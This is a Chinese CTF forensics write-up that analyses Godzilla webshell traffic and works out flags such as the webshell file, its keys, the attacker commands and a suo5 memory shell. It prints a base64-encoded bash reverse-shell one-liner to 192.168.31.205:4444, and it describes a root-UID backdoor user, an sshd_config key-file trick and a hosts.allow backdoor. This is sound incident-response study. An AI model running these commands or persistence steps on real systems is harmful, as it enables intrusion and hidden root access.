哥斯拉ekp版本流量分析
哥斯拉ekp版本流量分析
1.黑客上传的木马文件名是什么?
根据这个靶场提示这里是用哥斯拉连接的
我们先复习一下哥斯拉链接webshell的流量特征是什么
1 | 1. 流量中可见`eval`、`base64_decode`、`strrev`等函数 |
我们打开靶场下载的流量包,拿到wireshark分析,哥斯拉是用post的传输的,我们直接在wireshark里面抓取POST方式传输的流量包
1 | http.request.method =="POST" |

这里出现了很多./index.jsp文件我们再对这个文件进行针对搜索
1 | http contains "/.index.jsp" |

看到这里有个put包点开http追踪,是一个典型的 PUT Webshell 上传攻击流量

至此确定这个文件是木马文件
1 | flag{.index.jsp} |
2.黑客上传的木马连接密码是什么?
从第一题的上题最后的图片分析可知flag是
1 | flag{mypass} |
3.黑客上传的木马连接密钥是什么?
从第一题的上题最后的图片分析可知flag是
1 | flag{9adbe0b3033881f8} |
4.黑客连接webshell后执行的第一条命令是什么?
这里我们要对之前webshell的加密方式进行解密,自己不会这方面找在网上找了大佬的用,该代码用于解密一个经过双层 Base64 编码 + AES 加密的 Payload(如 WebShell 类、恶意类),并保存为 a.bin 文件,供后续分析或加载
1 | import javax.crypto.Cipher; |
继续翻阅流量包,在长度为440这里发现了不对,前面都是哥斯拉的初始化流量
如何判断哥斯拉初始化流量特征?
核心特征:
- 初始化流量包序列
- 连接成功时固定发送3个连续请求包:
- 首包:大体积POST请求(约23KB),上传加密Payload,响应为空但设置
PHPSESSID。 - 次包:测试连接(
methodName=test),响应体为16位MD5 + Base64("ok") + 16位MD5结构(PHP版小写,JSP版大写)。 - 三包:获取环境信息(
methodName=getBasicsInfo),响应结构同上。
- 首包:大体积POST请求(约23KB),上传加密Payload,响应为空但设置
- 检测要点:包顺序、响应体MD5包裹结构(强特征)。
- 连接成功时固定发送3个连续请求包:
- Cookie异常
- Cookie值末尾带分号(如
PHPSESSID=xxx;),违反HTTP规范(强特征)。
- Cookie值末尾带分号(如
- 加密与响应结构
- 使用
PHP_XOR_BASE64加密器时,请求含eval、base64关键词;RAW模式全乱码。 - 响应体始终为
MD5前16位 + Base64密文 + MD5后16位。
- 使用
- 弱特征(易修改)
- UA头默认含JDK版本(如
Java/1.8.0_121)。 - Accept头固定为
text/html, image/gif, image/jpeg, *; q=.2, /; q=.2(JDK引入)
- UA头默认含JDK版本(如

这里的流量包不再是三个连续的流量包并且是一个大两个小的特征了
讲加密密文拿去解密

现将密文进行一次url解码
再把密文丢进刚刚的解密脚本里面,解密完出来会在目录下面生成一个a.bin文件,讲bin后缀改为zip解压

解压完后用010打开,可以看到黑客执行的命令
1 | flag{cat /etc/passwd} |

5.这个木马是根据哪个参数进行回显的?(提交参数名)
从刚才的返回包的流量包就能看出来
1 | flag{Rec106e_config} |

6.黑客留下后门的反连的IP和PORT是什么?(flag{IP,PORT})
继续分析流量包,在长度为552这里发现没有返回包,怀疑是黑客进行的反联操作

将包复制先进行一次url解码

讲解码完后的base64编码放进刚刚的解密脚本里面会在当前目录下生成一个a.bin文件将后缀改为zip用文本编译器打开就行了我这里用的sublime
可以看到这里执行了一段base64加密代码,讲加密代码解密
1 | echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuMjA1LzQ0NDQgMD4mMQ==|base64 -d|bash |

可看到是黑客的反连操作能看到反连的地址和端口
1 | flag{192.168.31.205,4444} |

7.黑客通过后门反连执行的第一条命令是什么?
继续看流量包吧,上面我们看到了黑客的地址和端口,我们针对进行搜索
1 | ip.src==192.168.31.205 && tcp.port==4444 |

按照时间顺序排序第一个打开具看到了命令执行 第一个命令是ls
1 | flag{ls} |

8.黑客新增的后门用户名密码是什么?(提交flag{username,password})
从上面那段base64加密后解密可以看到
以下表格总结命令中各参数的作用,结合资料中的技术细节:
| 参数/子命令 | 含义 | 作用解析 | |
|---|---|---|---|
useradd |
添加用户 | 主命令,用于创建新用户。 | |
-p \openssl passwd -1 -salt ‘salt’ Xj@666.`` |
设置加密密码 | -p 需接受加密密码;子命令生成密码哈希: - openssl passwd: 生成密码哈希的工具。 - -1: 使用 MD5 算法加密(旧版 Linux 兼容)。- -salt 'salt': 指定盐值(salt)为 salt,盐值用于增加哈希随机性,防止彩虹表攻击(静态盐值降低安全性)。- Xj@666.: 明文密码(含特殊字符 @ 和 .,需确保转义)。- 输出示例:类似 $1$salt$... 的哈希字符串((https://epubservercos.yuewen.com/E8FBE0/29427546503421506/epubprivate/OEBPS/Images/45_02.jpg))。 |
|
x |
用户名 | 新用户登录名为 x(建议用描述性名称,避免混淆)。 |
|
-o |
允许重复 UID | 覆盖 UID 唯一性限制,允许创建另一个 UID 0 的用户(默认 UID 0 仅限 root)。 | |
-u 0 |
用户 ID (UID) | 设置 UID 为 0(root 的 UID),赋予 root 权限。 |
|
-g root |
主组 | 设置主组为 root(GID 0)。 |
|
-G root |
附加组 | 添加用户到附加组 root(确保用户属于 root 组)。 |
|
-s /bin/bash |
默认 Shell | 设置登录 Shell 为 Bash(标准交互环境)。 |
关键子命令详解:openssl passwd -1 -salt 'salt' Xj@666.
1 | flag{x,Xj@666.} |
9.黑客新增的后门文件是什么?(提交完整路径)
上机操作,使用命令grep -r "/dev/tcp" .用于递归搜索当前目录及子目录下所有文件,找出包含 /dev/tcp 字符串的内容。
为什么要搜索这个文件?
黑客常利用
/dev/tcp在入侵主机上建立反向连接。此命令可快速定位含有此类特征的恶意脚本(如 PHP、Shell、Python 文件)关键目录建议:
若怀疑系统被入侵,需扩展搜索至敏感目录:grep -r “/dev/tcp” /etc /var /tmp /home /usr/local/bin

可以看到后门文件被写在了./etc/hosts.allow下面

1 | flag{/etc/hosts.allow} |
10.黑客的后门公钥是什么?(提交公钥的md5值)
上机查看 /etc/ssh/sshd_config文件

sshd_config 的恶意修改
- 黑客在
/etc/ssh/sshd_config中添加自定义路径:
1 | AuthorizedKeysFile .ssh/authorized_keys /root/.bash_h1story/.keys |
路径伪装(.bash_h1story)、命名异常(.keys)、配置篡改(sshd_config)及 MD5 指纹唯一性 的四重验证,可确认 /root/.bash_h1story/.keys 为黑客植入的公钥文件


1 | flag{d7bf0e27d6f533604250faceb28b6d4b} |
11.黑客注入的内存马代理是哪种类型的
将长度为552的流量包解密后发现是java的内存吗



1 | flag{suo5} |
12.这个代理的路径是什么
根据上一题解密出来的的流量包发现 最后的请求路径为/connect
1 | flag{/connect} |
13.这个代理的连接密码是什么
代理的链接密码就是userAgent这个值
1 | flag{Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3} |

1 | flag{e3c77fd790af8d25fe271cd275eb405e} |
14.黑客扫描了哪个ip的哪些端口
分析流量包讲最后一条的这个流量包进行解密


873,3306,80,8080,81,8081,21,22,88,8088,8888,1433,443,445,3389,222都是一些常见的端口
1 | flag{127.0.0.1,873,3306,80,8080,81,8081,21,22,88,8088,8888,1433,443,445,3389,222} |
15、黑客扫描到开放的端口有哪些?(端口从小到大排序提交 如:flag{21,22,23})
我们把这里套流量包的的返回包解密

1 | O0pxNnI7RBLmTfxrZXBrd1hPUptIuxNFvFA0fwK3H6tpwnz3L//0O5GRj/NMw8O+Ve0PQGfQQGLSAWkVLE1AB9EV0bTKEBBhx/vVcCW6STm7yr2TwRZZHhMn5g3vJvX1 |
1 | String m="O0pxNnI7RBLmTfxrZXBrd1hPUptIuxNFvFA0fwK3H6tpwnz3L//0O5GRj/NMw8O+Ve0PQGfQQGLSAWkVLE1AB9EV0bTKEBBhx/vVcCW6STm7yr2TwRZZHhMn5g3vJvX1"; |
脚本少解密一次base64编码
有1的是开放的端口 222 8081
1 | flag{222,8081} |
最后感谢两位大佬的文章







